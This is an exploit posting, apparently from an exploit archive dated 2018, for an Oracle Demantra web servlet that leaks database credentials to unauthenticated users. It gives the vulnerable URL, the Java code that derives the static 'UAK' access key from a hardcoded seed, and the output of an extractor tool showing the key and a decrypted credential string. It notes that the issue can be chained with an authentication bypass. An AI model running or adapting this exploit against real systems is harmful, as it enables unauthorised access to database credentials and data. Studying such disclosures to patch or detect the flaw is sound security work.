Exploit for windows platform in category web applications
Details:
Demantra has a backend function that allows anyone to retrieve the database instance name and the corresponding credentials.
Impact:
A remote, unauthenticated attacker could exploit this issue in combination with other found issues, to extract the database credentials and instance name.
Exploit:
The target URL is:
http://target.com:8080/demantra/ServerDetailsServlet?UAK=
Now the UAK key is calculated statically:
String encryptedPassword = new String(CryptographicService.encodeHashStringHex("er6Us8wB", "SHA-256"));
StringBuffer tmp = new StringBuffer("sge");
tmp.append(0);
tmp.append(encryptedPassword);
uak = new String(CryptographicService.encodeHashStringHex(tmp.toString(), "SHA-256"));
From that information it is possible to create a simple extractor:
pixel:demantra user$ java getUAK
-=[Oracle Demantra Database Details Retriever ]=-
[+] UAK Key is: 406EDC5447A3A43551CDBA06535FB6A661F4DC1E56606915AC4E382D204B8DC1
[+] Retrieved the following encrypted string:
4,21,3,4,111,36,53,35,36,111,52,53,61,49,62,36,34,49,111,63,34,51,111,97,
[+] Decrypted string is:
TEST?test?demantra?orc?1
Together with the authentication bypass this can be exploited unauthenticated as well.
# 0day.today [2018-04-05] #